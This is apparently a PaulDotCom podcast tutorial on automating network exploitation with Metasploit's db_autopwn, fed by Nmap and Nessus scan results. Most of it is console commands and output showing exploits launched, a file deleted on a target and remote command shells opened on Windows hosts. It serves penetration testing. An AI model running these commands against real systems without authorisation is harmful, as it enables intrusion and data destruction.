From PaulDotCom episode 124: Tech Segment: Automating Exploitation With Metasploit's db_autopwn There is tremendous value in identifying vulnerabilities in your network, whether from the outside looking in, or the inside looking out. I like to try to automate this process as best I can, then use manual methods to further verify my work. For example, lets say I want to quickly verify the results from an Nmap or Nessus scan, and see if any of the Windows hosts are vulnerable to common Microsoft exploits. I can use Metasploit to do this, as it will test for the common remotely exploitable Windows vulnerabilities. The first step is to setup Metasploit with a database module and create a database: msf > load db_sqlite3[*] Successfully loaded plugin: db_sqlite3msf > db_create mynetwork[*] Creating a new database instance...[*] Successfully connected to the database[*] File: mynetwork msf >From here, I have many options. I can import Nmap results from a previous scan using the XML results (-oX): msf > db_import_nmap_xml mynetwork.xmlUsing the db_nmap module I can run Nmap directly from Metasploit and populate the database: msf > db_nmap -sS -T4 -O 192.168.1.0/24[*] exec: "/usr/local/bin/nmap" "-sS" "-T4" "-O" "192.168.1.0/24" "-oX" "/tmp/dbnmap.29736.0"NMAP: NMAP: Starting Nmap 4.76 ( http://nmap.org ) at 2008-09-25 09:05 EDTI can now launch exploits against known targets, but only by open port (since we ran Nmap and only collected the open port information): msf > db_autopwn -p -e-p means exploit the vulnerabilities according to open port, and -e gives the "exploit" command. When I do this, I give Metasploit a lot of work to do: <snip>[*] Launching exploit/netware/smb/lsass_cifs (19/727) against 192.168.1.244:445...[*] Launching exploit/windows/http/badblue_passthru (20/727) against 192.168.1.52:80... [-] Exploit failed: The server responded with error: STATUS_OBJECT_NAME_NOT_FOUND (Command=162 WordCount=0)[*] Started bind handler[*] Trying target BadBlue 2.72b Universal... [*] Server may not be vulnerable. [*] Calling the vulnerable function... [*] Successfully removed /config/password.txt [*] Command shell session 1 opened (192.168.1.204:58664 -> 192.168.1.52:34657) [*] Launching exploit/windows/iis/ms01_023_printer (22/727) against 192.168.1.226:80... [*] Started bind handler <snip> 727 possible exploit vectors! That took a while. So, I decided to run Nessus against my network, then import the Nessus results: msf > db_import_nessus_nbe windows.nbeNow I run db_autopwn, and tell it to select modules based on the vulnerability reference: msf > db_autopwn -x -eThis produces much better results: msf > sessions -lActive sessions=============== Id Description Tunnel -- ----------- ------ 1 Command shell 192.168.1.204:60530 -> 192.168.1.52:37541 2 Command shell 192.168.1.204:61047 -> 192.168.1.52:13917 3 Command shell 192.168.1.204:61306 -> 192.168.1.52:6112 4 Command shell 192.168.1.204:61350 -> 192.168.1.52:5646msf > sessions -i 2 [*] Starting interaction with 2... Microsoft Windows 2000 [Version 5.00.2195](C) Copyright 1985-2000 Microsoft Corp.C:\WINNT\system32> |
|
|
|
Metasploit |
Social Coding |
